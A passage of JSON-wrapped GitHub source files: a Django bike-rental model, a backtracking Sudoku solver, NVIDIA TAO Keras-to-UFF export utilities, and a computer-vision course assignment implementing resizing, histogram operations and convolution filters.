+{"seq_id":"27199906692","text":"import uuid\n\nimport requests\nfrom django.conf import settings\nfrom django.contrib.gis.measure import D\nfrom django.db import models\nfrom django.db.utils import IntegrityError\nfrom django.dispatch import receiver\nfrom django.utils.timezone import now\nfrom preferences import preferences\n\nfrom cykel.models import CykelLogEntry\n\nfrom .bike import Bike\nfrom .lock_type import LockType\nfrom .station import Station\n\n\nclass Rent(models.Model):\n rent_start = models.DateTimeField()\n rent_end = models.DateTimeField(default=None, null=True, blank=True)\n start_location = models.ForeignKey(\n \"Location\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_start_location\",\n )\n start_station = models.ForeignKey(\n \"Station\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_start_station\",\n )\n end_location = models.ForeignKey(\n \"Location\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_end_location\",\n )\n end_station = models.ForeignKey(\n \"Station\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_end_station\",\n )\n bike = models.ForeignKey(\"Bike\", default=None, on_delete=models.PROTECT)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.PROTECT)\n\n def __repr__(self):\n return \"\"\"Rent #{id}: Bike {bike} for User '{user}'\\n rented {rent_start}\n from {start_location}/{start_station}\\n return {rent_end}\n at {end_location}/{end_station}\"\"\".format(\n id=self.id,\n bike=self.bike,\n user=self.user,\n start_location=self.start_location,\n start_station=self.start_station,\n rent_start=self.rent_start,\n end_location=self.end_location,\n end_station=self.end_station,\n rent_end=self.rent_end,\n )\n\n def unlock(self):\n if self.bike.lock is None:\n return {}\n\n lock = self.bike.lock\n lock_type = lock.lock_type\n\n if lock_type is None:\n return {}\n\n if lock_type.form_factor == LockType.FormFactor.COMBINATION_LOCK:\n return {\"unlock_key\": self.bike.lock.unlock_key}\n\n if lock_type.form_factor == LockType.FormFactor.ELECTRONIC_LOCK:\n url = \"{url}/{device_id}/unlock\".format(\n url=lock_type.endpoint_url, device_id=lock.lock_id\n )\n r = requests.post(url)\n data = r.json()\n return {\"data\": data}\n\n return {}\n\n def end(self, end_location=None, force=False):\n self.rent_end = now()\n if end_location:\n self.end_location = end_location\n elif self.bike.public_geolocation():\n self.end_location = self.bike.public_geolocation()\n\n self.save()\n\n if self.end_location:\n # attach bike to station if location is closer than X meters\n # distance is configured in preferences\n max_distance = preferences.BikeSharePreferences.station_match_max_distance\n station_closer_than_Xm = Station.objects.filter(\n location__distance_lte=(self.end_location.geo, D(m=max_distance)),\n status=Station.Status.ACTIVE,\n ).first()\n if station_closer_than_Xm:\n self.bike.current_station = station_closer_than_Xm\n self.end_station = station_closer_than_Xm\n self.save()\n else:\n self.bike.current_station = None\n\n # set Bike status back to available\n self.bike.availability_status = Bike.Availability.AVAILABLE\n self.bike.save()\n try:\n # set new non static bike ID, so for GBFS observers can not track this bike\n self.bike.non_static_bike_uuid = uuid.uuid4()\n self.bike.save()\n except IntegrityError:\n # Congratulations! 
The 2^64 chance of uuid4 collision has happend.\n # here could be the place for the famous comment: \"should never happen\"\n # So we catch this error, but don't handle it,\n # because don't rotating a uuid every 18,446,744,073,709,551,615 rents is ok\n pass\n\n if self.bike.state == Bike.State.MISSING:\n data = {}\n if self.end_location:\n data = {\"location_id\": self.end_location.id}\n CykelLogEntry.objects.create(\n content_object=self.bike,\n action_type=\"cykel.bike.missing_reporting\",\n data=data,\n )\n\n if self.end_station:\n CykelLogEntry.objects.create(\n content_object=self.bike,\n action_type=\"cykel.bike.rent.finished.station\",\n data={\n \"rent_id\": self.id,\n \"trip_duration\": int(\n (self.rent_end - self.rent_start).total_seconds()\n ),\n \"station_id\": self.end_station.id,\n **({\"forced\": True} if force else {}),\n },\n )\n else:\n CykelLogEntry.objects.create(\n content_object=self.bike,\n action_type=\"cykel.bike.rent.finished.freefloat\",\n data={\n \"rent_id\": self.id,\n \"trip_duration\": int(\n (self.rent_end - self.rent_start).total_seconds()\n ),\n \"location_id\": getattr(self.end_location, \"id\", None),\n **({\"forced\": True} if force else {}),\n },\n )\n\n\n@receiver(models.signals.post_save, sender=Rent)\ndef rent_started(sender, instance, created, *args, **kwargs):\n # only interested in the first save\n if not created:\n return\n if instance.start_station:\n CykelLogEntry.objects.create(\n content_object=instance.bike,\n action_type=\"cykel.bike.rent.started.station\",\n data={\n \"rent_id\": instance.id,\n \"station_id\": instance.start_station.id,\n },\n )\n else:\n CykelLogEntry.objects.create(\n content_object=instance.bike,\n action_type=\"cykel.bike.rent.started.freefloat\",\n data={\n \"rent_id\": instance.id,\n \"location_id\": getattr(instance.start_location, \"id\", None),\n },\n )\n","repo_name":"transportkollektiv/cykel","sub_path":"bikesharing/models/rent.py","file_name":"rent.py","file_ext":"py","file_size_in_byte":6679,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"53"}
+{"seq_id":"26988227943","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 26 11:54:26 2019\n\n@author: khushboogoyal\n\"\"\"\n\n\"\"\"this is the fucntion which check whether the board is full or not \nand return true and false, if it finds aleast one zero on the board\"\"\"\n\nimport time, os , psutil\ncount = 0\n\ndef BoradisFull(board):\n \n for x in range(0,9):\n for y in range(0,9):\n if board[x][y] == 0:\n \n return False\n \n\n print(\"board is filled\")\n \n return True\n\n \n print(\"board is yet to be solved\")\n \n\n\ndef possibleEntry(board , i, j):\n \n k=0\n l = 0\n \n \n \n \"\"\"this is the list to fill possible Array\"\"\"\n possibleArray = {}\n for x in range (1, 10):\n \n possibleArray[x] = 0\n #print('count is----',count) \n \n # for horizontal values\n for y in range (0, 9):\n \n if not board[i][y] == 0: \n \n possibleArray[board[i][y]] = 1\n \n # for vertical values\n \n for x in range (0, 9):\n if not board[x][j] == 0: \n possibleArray[board[x][j]] = 1\n \n #For squares\n\n # for i\n if i >= 0 and i <= 2:\n k = 0\n elif i >= 3 and i <= 5:\n k = 3\n else:\n k = 6\n \n # now for j\n if j >= 0 and j <= 2:\n l = 0\n elif j >= 3 and j <= 5:\n l = 3\n else:\n l = 6\n for x in range (k, k + 3):\n for y in range (l, l + 3):\n if not board[x][y] == 0:\n possibleArray[board[x][y]] = 1 \n \n for x in range (1, 10):\n if possibleArray[x] == 0:\n possibleArray[x] = x\n else:\n possibleArray[x] = 0\n \n return possibleArray\n\n\ndef printBoard(board):\n print(\"*********************\")\n for x in range(0, 9):\n if x == 3 or x == 6:\n print(\"*********************\")\n for y in range(0, 9):\n if y == 3 or y == 6:\n print(\"*\", end=\" \")\n print(board[x][y], end=\" \")\n print()\n print(\"*********************\")\n \n \ndef sudokuSolver(board):\n \n i = 0\n j = 0\n \n possiblity = {}\n global count; count += 1\n # function to check full board if in case and return board\n if BoradisFull(board):\n \n printBoard(board)\n print(\"Board Solved Successfully!\")\n \n return\n \n else:\n # check the first blank spot\n for x in range (0, 9):\n for y in range (0, 9):\n if board[x][y] == 0:\n # now i and j holds the value of x and y\n i = x\n j = y\n \n break\n else:\n continue\n break\n \n \n # get all the possibilities for i,j\n possiblity = possibleEntry(board, i, j)\n #print(possiblity)\n \n # go through all the possibilities and call the the function\n # again and again\n \n \n for x in range (1, 10):\n \n if not possiblity[x] == 0:\n board[i][j] = possiblity[x]\n \n #check again whole program\n sudokuSolver(board)\n\n \n \n \n # backtrack and it reset the particular step to 0\n board[i][j] = 0 \n \n \n \ndef main():\n \n start = time.time()\n grid=[[0 for x in range(9)]for y in range(9)] \n \n # assigning values to the grid \n #grid=[[0,0,0,0,0,9,0,0,5],\n # [0,0,9,1,0,0,0,0,7],\n # [8,0,0,0,0,3,0,0,4],\n # [9,6,0,0,0,1,8,0,0],\n # [0,0,0,0,0,0,0,0,0],\n # [0,0,2,6,0,0,0,5,1],\n #[3,0,0,9,0,0,0,0,2],\n #[1,0,0,0,0,2,3,0,0],\n #[7,0,0,4,0,0,0,0,0]]\n \n grid=[[4,0,0,0,0,5,0,0,0],\n [0,9,0,0,6,0,0,0,0],\n [6,0,0,0,2,0,4,8,0],\n [0,8,0,0,0,7,0,6,4],\n [0,5,9,0,0,0,8,3,0],\n [7,6,0,9,0,0,0,5,0],\n [0,7,5,0,4,0,0,0,8],\n [0,0,0,0,7,0,0,4,0],\n [0,0,0,1,0,0,0,0,2]]\n \n \n \n \n print(\"Board is yet to be filled\")\n printBoard(grid)\n sudokuSolver(grid)\n print('number of iterations',count)\n end = time.time()\n print(\"Time to run: {}\".format(end - start))\n \n \n \nif __name__ == \"__main__\":\n \n pid=os.getpid()\n \n ps= psutil.Process(pid)\n 
memoryUse = ps.memory_info()\n \n print(\"memory\", memoryUse.vms)\n main()\n\n\n\n\n\n","repo_name":"Khushgoyal/suduko_backtracking","sub_path":"backtracking_sudoku.py","file_name":"backtracking_sudoku.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20610974961","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport tempfile\n\nimport keras\nfrom nvidia_tao_tf1.core.export._quantized import (\n check_for_quantized_layers,\n process_quantized_layers,\n)\n\nfrom tensorflow.core.protobuf import saver_pb2\nfrom tensorflow.python.framework import graph_io\nfrom tensorflow.python.tools import freeze_graph\nfrom tensorflow.python.training import saver as saver_lib\nimport uff\nfrom uff.model.utils import convert_to_str\n\n\n\"\"\"Logger for UFF export APIs.\"\"\"\nlogger = logging.getLogger(__name__)\n\n\ndef _reload_model_for_inference(model, custom_objects=None):\n \"\"\"Reload a model specifically for doing inference.\n\n In order to export a model we need remove training-specific\n parts of the graph. For example, BatchNormalization layers\n may feature conditional branching to do training and inference\n alternately. This confused the UFF export tool.\n\n NOTE: the current Keras session is cleared in this function.\n Do not use this function during training.\n\n Args:\n model (Model): Keras model to reload in inference mode.\n custom_objects (dict): dictionary mapping names (strings) to custom\n classes or functions to be considered during deserialization for export.\n Returns:\n A model that can be used for inference only.\n \"\"\"\n # Save model to a temp file so we can reload it later.\n os_handle, tmp_model_file_name = tempfile.mkstemp(suffix=\".h5\")\n os.close(os_handle)\n model.save(tmp_model_file_name)\n\n # Make sure Keras session is clean and tuned for inference.\n keras.backend.clear_session()\n keras.backend.set_learning_phase(0)\n\n @classmethod\n def apply_fused_padding(cls, tf_node, inputs, tf_nodes):\n tf_padding = convert_to_str(tf_node.attr[\"padding\"].s)\n padding = None\n fields = {}\n if tf_padding == \"SAME\":\n fields[\"implicit_padding\"] = \"same\"\n elif tf_padding == \"VALID\":\n fields[\"implicit_padding\"] = None\n tf_lhs_node = tf_nodes[inputs[0]]\n if tf_lhs_node.op == \"Pad\":\n tf_padding_node = tf_nodes[tf_lhs_node.input[1]]\n p = cls.convert_tf2numpy_const_node(tf_padding_node)\n before, after = p[:, 0].tolist(), p[:, 1].tolist()\n if before == after:\n padding = before\n inputs[0] = tf_lhs_node.input[0]\n if tf_nodes[inputs[0]].op == \"Identity\":\n logger.info(\"Modulus patch identity layer in padding inputs.\")\n inputs[0] = tf_nodes[inputs[0]].input[0]\n else:\n raise ValueError(\"Padding mode %s not supported\" % tf_padding)\n return inputs, padding, fields\n\n def compose_call(prev_call_method):\n def call(self, inputs, training=False):\n return prev_call_method(self, inputs, training)\n\n return call\n\n def dropout_patch_call(self, inputs, training=False):\n # Just return the input tensor. 
Keras will map this to ``keras.backend.identity``,\n # which the TensorRT 3.0 UFF parser supports.\n return inputs\n\n # Patch BatchNormalization and Dropout call methods so they don't create\n # the training part of the graph.\n prev_batchnorm_call = keras.layers.normalization.BatchNormalization.call\n prev_dropout_call = keras.layers.Dropout.call\n\n logger.debug(\"Patching keras BatchNormalization...\")\n keras.layers.normalization.BatchNormalization.call = compose_call(\n prev_batchnorm_call\n )\n\n logger.debug(\"Patching keras Dropout...\")\n keras.layers.Dropout.call = dropout_patch_call\n\n logger.debug(\"Patching UFF TensorFlow converter apply_fused_padding...\")\n uff.converters.tensorflow.converter.TensorFlowToUFFConverter.apply_fused_padding = (\n apply_fused_padding\n )\n\n # Reload the model.\n model = keras.models.load_model(\n tmp_model_file_name, compile=False, custom_objects=custom_objects\n )\n\n # Unpatch Keras.\n logger.debug(\"Unpatching keras BatchNormalization layer...\")\n keras.layers.normalization.BatchNormalization.call = prev_batchnorm_call\n\n logger.debug(\"Unpatching keras Dropout layer...\")\n keras.layers.Dropout.call = prev_dropout_call\n\n # Delete temp file.\n os.remove(tmp_model_file_name)\n\n return model\n\n\ndef keras_to_pb(model, output_filename, output_node_names, custom_objects=None):\n \"\"\"Export a Keras model to Protobuf format.\n\n The Protobuf format is a TensorFlow-specific representation\n of the model.\n\n NOTE: the current Keras session is cleared in this function.\n Do not use this function during training.\n\n Args:\n model (Model): Keras model to export.\n output_filename (str): file to write exported model to.\n output_node_names (list of str): list of model output node names as\n returned by model.layers[some_idx].get_output_at(0).name.split(':')[0].\n If None, then the model output layers are used as output nodes.\n custom_objects (dict): dictionary mapping names (strings) to custom\n classes or functions to be considered during deserialization for export.\n Returns:\n tuple:\n in_tensor_name(s): The name(s) of the input nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n out_tensor_name(s): The name(s) of the output nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n in_tensor_shape(s): The shape(s) of the input tensors for this network. 
If there is only\n one input tensor, it will be returned as a single list, otherwise\n a list>.\n \"\"\"\n model = _reload_model_for_inference(model, custom_objects=custom_objects)\n\n layers_with_external_state_io = [\n layer for layer in model.layers if hasattr(layer, \"is_stateful\")\n ]\n\n def get_layer_name(layer):\n _layer_outputs = layer.get_output_at(0)\n if isinstance(_layer_outputs, list):\n return [lo.name.split(\":\")[0] for lo in _layer_outputs]\n return _layer_outputs.name.split(\":\")[0]\n\n # Get names of input and output nodes.\n in_tensors = model.inputs\n in_tensor_shape = keras.backend.int_shape(in_tensors[0])\n in_name = in_tensors[0].op.name\n\n if layers_with_external_state_io:\n in_name = [in_name]\n in_tensor_shape = [in_tensor_shape]\n for layer in layers_with_external_state_io:\n if layer.is_stateful:\n in_name.append(layer.state_input_name)\n else:\n # Add feature maps of past frames for stateless models\n in_name.extend(layer._past_feature_names)\n shape = layer.input_shape\n shape = shape if shape[0] is None or isinstance(shape[0], int) else shape[0]\n in_tensor_shape.append(shape)\n\n if output_node_names is None:\n output_node_names = [t.op.name for t in model.outputs]\n\n # Replace the sliced output node with original output layers. For example, an output node\n # named `sliced_output_cov/Sigmoid` will be replaced with `output_cov/Sigmoid`\n layer_output_names = [get_layer_name(layer) for layer in model.layers]\n original_output_names = []\n for name in output_node_names:\n # For each sliced output node, search its original node by name and use the original\n # node to replace the sliced output node.\n if name.startswith(\"sliced_output_\"):\n original_output_name_prefix = name.split(\"/\")[0][7:]\n original_output_names += [\n output_name\n for output_name in layer_output_names\n if output_name.startswith(original_output_name_prefix)\n ]\n else:\n original_output_names.append(name)\n output_node_names = original_output_names\n\n # Add output node names for the recurrent layers,\n # to handle the state external to TRT model.\n for layer in layers_with_external_state_io:\n if layer.is_stateful:\n temporal_output_node_name = get_layer_name(layer)\n else:\n temporal_output_node_name = layer.get_input_at(0).name.split(\":\")[0]\n if temporal_output_node_name not in output_node_names:\n output_node_names.append(temporal_output_node_name)\n\n # Freeze model.\n sess = keras.backend.get_session()\n\n # TensorFlow freeze_graph expects a comma separated string of output node names.\n output_node_names_tf = \",\".join(output_node_names)\n\n saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V2)\n\n # Save the checkpoint file to a temporary location.\n os_handle, tmp_ckpt_file_name = tempfile.mkstemp(suffix=\".ckpt\")\n os.close(os_handle)\n checkpoint_path = saver.save(sess, tmp_ckpt_file_name)\n graph_io.write_graph(sess.graph, \".\", output_filename)\n freeze_graph.freeze_graph(\n input_graph=output_filename,\n input_saver=\"\",\n input_binary=False,\n input_checkpoint=checkpoint_path,\n output_node_names=output_node_names_tf,\n restore_op_name=\"save/restore_all\",\n filename_tensor_name=\"save/Const:0\",\n output_graph=output_filename,\n clear_devices=False,\n initializer_nodes=\"\",\n )\n\n # Clean up.\n os.remove(tmp_ckpt_file_name)\n\n return in_name, output_node_names, in_tensor_shape\n\n\ndef pb_to_uff(input_filename, output_filename, out_names, text=False, quiet=True):\n \"\"\"Convert a TensorFlow model to UFF.\n\n The input model needs to be passed 
as a frozen Protobuf file.\n The export UFF model may be parsed and optimized by TensorRT.\n\n Args:\n input_filename (str): path to protobuf file.\n output_filename (str): file to write exported model to.\n out_names (list of str): list of the names of the output nodes.\n text (boolean): whether to save .pbtxt file.\n quiet (boolean): whether to enable quiet mode.\n \"\"\"\n uff.from_tensorflow_frozen_model(\n input_filename,\n out_names,\n output_filename=output_filename,\n text=text,\n quiet=quiet,\n )\n\n\ndef keras_to_uff(model, output_filename, output_node_names=None, custom_objects=None):\n \"\"\"Export a Keras model to UFF format.\n\n UFF stands for Universal Framework Format and is an NVIDIA\n TensorRT file format for storing a neural network's topology and\n weights.\n\n NOTE: the current Keras session is cleared in this function.\n Do not use this function during training.\n\n Args:\n model (Model): Keras model to export.\n output_filename (str): file to write exported model to.\n output_node_names (list of str): list of model output node names as\n returned by model.layers[some_idx].get_output_at(0).name.split(':')[0].\n If not provided, then the last layer is assumed to be the output node.\n custom_objects (dict): dictionary mapping names (strings) to custom\n classes or functions to be considered during deserialization for export.\n Returns:\n tuple:\n in_tensor_name(s): The name(s) of the input nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n out_tensor_name(s): The name(s) of the output nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n in_tensor_shape(s): The shape(s) of the input tensors for this network. If there is only\n one input tensor, it will be returned as a single list, otherwise\n a list>.\n\n These must be passed to the TensorRT optimization tool to identify input and output blobs.\n \"\"\"\n # First, convert model to a temporary TensorFlow Protobuf.\n if check_for_quantized_layers(model):\n calib_json = output_filename + \".json\"\n model, _ = process_quantized_layers(model, \"uff\", calib_json=calib_json)\n\n os_handle, tmp_pb_file_name = tempfile.mkstemp(suffix=\".pb\")\n os.close(os_handle)\n in_tensor_name, out_tensor_names, in_tensor_shapes = keras_to_pb(\n model, tmp_pb_file_name, output_node_names, custom_objects=custom_objects\n )\n\n # Second, convert protobuf to UFF.\n pb_to_uff(tmp_pb_file_name, output_filename, out_tensor_names)\n\n # Clean up.\n os.remove(tmp_pb_file_name)\n\n # Return a string instead of a list if there is only one output node.\n if len(out_tensor_names) == 1:\n out_tensor_names = out_tensor_names[0]\n\n return in_tensor_name, out_tensor_names, in_tensor_shapes\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/core/export/_uff.py","file_name":"_uff.py","file_ext":"py","file_size_in_byte":13039,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"7745681467","text":"import numpy as np\nfrom skimage import io\nimport os.path as osp\n\ndef load_image(file_name):\n \"\"\"\n Load image from disk\n :param file_name:\n :return: image: numpy.ndarray\n \"\"\"\n if not osp.exists(file_name):\n print('{} not exist'.format(file_name))\n return\n image = np.asarray(io.imread(file_name))\n if len(image.shape)==3 and image.shape[2]>3:\n image = image[:, :, :3]\n # print(image.shape) #should be (x, x, 3)\n return image\n\ndef save_image(image, file_name):\n \"\"\"\n Save image to disk\n :param image: numpy.ndarray\n :param file_name:\n :return:\n \"\"\"\n io.imsave(file_name,image)\n\ndef cs4243_resize(image, new_width, new_height):\n \"\"\"\n 5 points\n Implement the algorithm of nearest neighbor interpolation for image resize,\n Please round down the value to its nearest interger, \n and take care of the order of image dimension.\n :param image: ndarray\n :param new_width: int\n :param new_height: int\n :return: new_image: numpy.ndarray\n \"\"\"\n new_image = np.zeros((new_height, new_width, 3), dtype='uint8')\n if len(image.shape)==2:\n new_image = np.zeros((new_height, new_width), dtype='uint8')\n \n # ============= Your code here ============= #\n # Map each pixel in the new image with a pixel in the old image\n mapped_indices_i = np.floor(np.arange(new_height) * image.shape[0] / new_height).astype(np.int)\n mapped_indices_j = np.floor(np.arange(new_width) * image.shape[1] / new_width).astype(np.int)\n \n for i in range(new_height):\n for j in range(new_width):\n new_image[i, j] = image[mapped_indices_i[i], mapped_indices_j[j]]\n # ========================================= #\n return new_image\n\ndef cs4243_rgb2grey(image):\n \"\"\"\n 5 points\n Implement the rgb2grey function, use the\n weights for different channel: (R,G,B)=(0.299, 0.587, 0.114)\n Please scale the value to [0,1] by dividing 255\n :param image: numpy.ndarray\n :return: grey_image: numpy.ndarray\n \"\"\"\n if len(image.shape) != 3:\n print('RGB Image should have 3 channels')\n return\n \n # ============= Your code here ============= #\n # Matrix mult of image (Hi, Wi, 3) and weights (3, 1) ==> new image of (Hi, Wi, 1)\n weights = np.array([0.299, 0.587, 0.114])\n image = np.dot(image, weights)\n # ========================================= #\n\n return image/255.\n\ndef cs4243_histnorm(image, grey_level=256):\n \"\"\"\n 5 points \n Stretch the intensity value to [0, 255]\n :param image : ndarray\n :param grey_level\n :return res_image: hist-normed image\n Tips: use linear normalization here https://en.wikipedia.org/wiki/Normalization_(image_processing)\n \"\"\"\n res_image = image.copy()\n \n # ============= Your code here ============= #\n # Get global min and max intensity value\n min_level = res_image.min()\n max_level = res_image.max()\n \n # Normalizes the intensity values to [0, grey_level - 1]\n res_image = (res_image - min_level) / (max_level - min_level) * (grey_level - 1)\n # ========================================= #\n \n return res_image\n\n\n\ndef cs4243_histequ(image, grey_level=256):\n \"\"\"\n 10 points\n Apply histogram equalization to enhance the image.\n the cumulative histogram will aso be returned and used in the subsequent histogram matching function.\n :param image: numpy.ndarray(float64)\n :return: ori_hist: histogram of original image\n :return: cum_hist: cumulated hist of original image, pls normalize it with image size.\n :return: res_image: image after being applied histogram equalization.\n :return: uni_hist: histogram of the enhanced 
image.\n Tips: use numpy buildin funcs to ease your work on image statistics\n \"\"\"\n # ============= Your code here ============= #\n ori_hist = np.histogram(image, grey_level, (0, grey_level - 1))[0]\n cum_hist = np.cumsum(ori_hist) / (image.shape[0] * image.shape[1])\n uniform_hist = (grey_level - 1) * cum_hist\n # ========================================= #\n\n # Set the intensity of the pixel in the raw image to its corresponding new intensity \n height, width = image.shape\n res_image = np.zeros(image.shape, dtype='uint8') # Note the type of elements\n for i in range(height):\n for j in range(width):\n res_image[i,j] = uniform_hist[image[i,j]]\n \n uni_hist = np.bincount(res_image.flatten(), minlength=grey_level)\n return ori_hist, cum_hist, res_image, uni_hist\n \ndef cs4243_histmatch(ori_image, refer_image):\n \"\"\"\n 10 points\n Map value according to the difference between cumulative histogram.\n Note that the cum_hists of the two images can be very different. It is possible\n that a given value cum_hist[i] != cum_hist[j] for all j in [0,255]. In this case, please\n map to the closest value instead. if there are multiple intensities meet the requirement,\n choose the smallest one.\n :param ori_image #image to be processed\n :param refer_image #image of target gray histogram \n :return: ori_hist: histogram of original image\n :return: ref_hist: histogram of reference image\n :return: res_image: image after being applied histogram matching.\n :return: res_hist: histogram of the enhanced image.\n Tips: use cs4243_histequ to help you\n \"\"\"\n \n # ============= Your code here ============= #\n def find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value)).argmin()\n return array[idx]\n\n # Get PDF, CDF for original and ref images (x_axis = intensity val, y_axis = cumulative density)\n grey_level = 256\n ori_hist, cum_hist_ori, _, _ = cs4243_histequ(ori_image, grey_level)\n ref_hist, cum_hist_ref, _, _ = cs4243_histequ(refer_image, grey_level)\n\n # Get proportion to intensity value mapping of refer image\n p2i_ref = {}\n for intensity_val, proportion in enumerate(cum_hist_ref):\n if proportion not in p2i_ref:\n p2i_ref[proportion] = intensity_val\n\n map_value = np.zeros(grey_level, dtype='uint8')\n for intensity_val, proportion in enumerate(cum_hist_ori):\n if proportion not in p2i_ref:\n # Find the nearest value if there is no exact match\n proportion = find_nearest(cum_hist_ref, proportion)\n\n map_value[intensity_val] = p2i_ref[proportion]\n # ========================================= #\n \n # Set the intensity of the pixel in the raw image to its corresponding new intensity \n height, width = ori_image.shape\n res_image = np.zeros(ori_image.shape, dtype='uint8') # Note the type of elements\n for i in range(height):\n for j in range(width):\n res_image[i,j] = map_value[ori_image[i,j]]\n \n res_hist = np.bincount(res_image.flatten(), minlength=256)\n \n return ori_hist, ref_hist, res_image, res_hist\n\n\ndef cs4243_rotate180(kernel):\n \"\"\"\n Rotate the matrix by 180. \n Can utilize build-in Funcs in numpy to ease your work\n :param kernel:\n :return:\n \"\"\"\n kernel = np.flip(np.flip(kernel, 0),1)\n return kernel\n\ndef cs4243_gaussian_kernel(ksize, sigma):\n \"\"\"\n 5 points\n Implement the simplified Gaussian kernel below:\n k(x,y)=exp(((x-x_mean)^2+(y-y_mean)^2)/(-2sigma^2))\n Make Gaussian kernel be central symmentry by moving the \n origin point of the coordinate system from the top-left\n to the center. 
Please round down the mean value. In this assignment,\n we define the center point (cp) of even-size kernel to be the same as that of the nearest\n (larger) odd size kernel, e.g., cp(4) to be same with cp(5).\n :param ksize: int\n :param sigma: float\n :return kernel: numpy.ndarray of shape (ksize, ksize)\n \"\"\"\n kernel = np.zeros((ksize, ksize))\n \n # ============= Your code here ============= #\n x_mean = y_mean = ksize // 2\n for i in range(ksize):\n for j in range(ksize):\n kernel[i, j] = np.exp(((i - x_mean) ** 2 + (j - y_mean) ** 2) / (-2 * (sigma ** 2)))\n # ========================================= #\n\n return kernel / kernel.sum()\n\ndef cs4243_filter(image, kernel):\n \"\"\"\n 10 points\n Implement the convolution operation in a naive 4 nested for-loops,\n :param image: numpy.ndarray\n :param kernel: numpy.ndarray\n :return:\n \"\"\"\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n filtered_image = np.zeros((Hi, Wi))\n\n # ============= Your code here ============= #\n kernel_center_i = Hk // 2\n kernel_center_j = Wk // 2\n \n # Implement convolution operation using L3 slide 29\n for i in range(Hi):\n for j in range(Wi):\n x_ij = 0\n for u in range(-kernel_center_i, kernel_center_i + 1):\n for v in range(-kernel_center_j, kernel_center_j + 1):\n img_i = i - u\n img_j = j - v\n knl_i = kernel_center_i + u\n knl_j = kernel_center_j + v\n\n if img_i < 0 or img_i >= Hi or img_j < 0 or img_j >= Wi:\n continue\n\n f_uv = kernel[knl_i, knl_j]\n p_ij = image[img_i, img_j]\n x_ij += f_uv * p_ij\n\n filtered_image[i, j] = x_ij\n # ========================================= #\n\n return filtered_image\n\ndef pad_zeros(image, pad_height, pad_width):\n \"\"\"\n Pad the image with zero pixels, e.g., given matrix [[1]] with pad_height=1 and pad_width=2, obtains:\n [[0 0 0 0 0]\n [0 0 1 0 0]\n [0 0 0 0 0]]\n :param image: numpy.ndarray\n :param pad_height: int\n :param pad_width: int\n :return padded_image: numpy.ndarray\n \"\"\"\n height, width = image.shape\n new_height, new_width = height+pad_height*2, width+pad_width*2\n padded_image = np.zeros((new_height, new_width))\n padded_image[pad_height:new_height-pad_height, pad_width:new_width-pad_width] = image\n return padded_image\n\ndef cs4243_filter_fast(image, kernel):\n \"\"\"\n 10 points\n Implement a fast version of filtering algorithm.\n take advantage of matrix operation in python to replace the \n inner 2-nested for loops in filter function.\n :param image: numpy.ndarray\n :param kernel: numpy.ndarray\n :return filtered_image: numpy.ndarray\n Tips: You may find the functions pad_zeros() and cs4243_rotate180() useful\n \"\"\"\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n filtered_image = np.zeros((Hi, Wi))\n\n # ============= Your code here ============= #\n kernel_center_i = Hk // 2\n kernel_center_j = Wk // 2\n\n image = pad_zeros(image, kernel_center_i, kernel_center_j)\n kernel = cs4243_rotate180(kernel)\n \n for i in range(Hi):\n for j in range(Wi):\n target = image[i:i+Hk, j:j+Wk]\n filtered_image[i, j] = np.sum(target * kernel)\n # ========================================= #\n\n return filtered_image\n\ndef cs4243_filter_faster(image, kernel):\n \"\"\"\n 10 points\n Implement a faster version of filtering algorithm.\n Pre-extract all the regions of kernel size,\n and obtain a matrix of shape (Hi*Wi, Hk*Wk),also reshape the flipped\n kernel to be of shape (Hk*Wk, 1), then do matrix multiplication, and rehshape back\n to get the final output image.\n :param image: numpy.ndarray\n :param kernel: numpy.ndarray\n :return 
filtered_image: numpy.ndarray\n Tips: You may find the functions pad_zeros() and cs4243_rotate180() useful\n \"\"\"\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n filtered_image = np.zeros((Hi, Wi))\n\n # ============= Your code here ============= #\n kernel = cs4243_rotate180(kernel).flatten()\n kernel_center_i = Hk // 2\n kernel_center_j = Wk // 2\n image = pad_zeros(image, kernel_center_i, kernel_center_j)\n \n regions = []\n for i in range(Hi):\n for j in range(Wi):\n target = image[i:i+Hk, j:j+Wk]\n regions.append(target)\n regions = np.array(regions).reshape((Hi*Wi, Hk*Wk)) \n filtered_image = np.dot(regions, kernel).reshape((Hi, Wi))\n # ========================================= #\n\n return filtered_image\n\ndef cs4243_downsample(image, ratio):\n \"\"\"\n Downsample the image to its 1/(ratio^2),which means downsample the width to 1/ratio, and the height 1/ratio.\n for example:\n A = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n B = downsample(A, 2)\n B=[[1, 3], [7, 9]]\n :param image:numpy.ndarray\n :param ratio:int\n :return:\n \"\"\"\n width, height = image.shape[1], image.shape[0]\n return image[0:height:ratio, 0:width:ratio]\n\ndef cs4243_upsample(image, ratio):\n \"\"\"\n upsample the image to its 2^ratio, \n :param image: image to be upsampled\n :param kernel: use same kernel to get approximate value for additional pixels\n :param ratio: which means upsample the width to ratio*width, and height to ratio*height\n :return res_image: upsampled image\n \"\"\"\n width, height = image.shape[1], image.shape[0]\n 